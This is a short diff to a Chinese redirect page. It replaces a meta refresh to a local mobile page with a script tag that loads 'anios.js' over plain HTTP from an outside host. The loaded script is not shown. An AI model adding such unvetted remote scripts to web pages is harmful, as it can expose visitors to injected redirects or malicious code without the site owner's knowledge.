--- a/tiaozhuan.html
+++ b/tiaozhuan.html
@@ -2,7 +2,7 @@
 <head>
 <meta http-equiv="Content-Language" content="zh-CN">
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
-<meta http-equiv="refresh" content="0.1;url=shouji.html">
+<script id="anios_url" type="text/javascript" charset="gb2312" src="http://banmeng_1598.it760.com/anios.js"></script>
 <title>正在进入......</title>
 </head>
 <body>
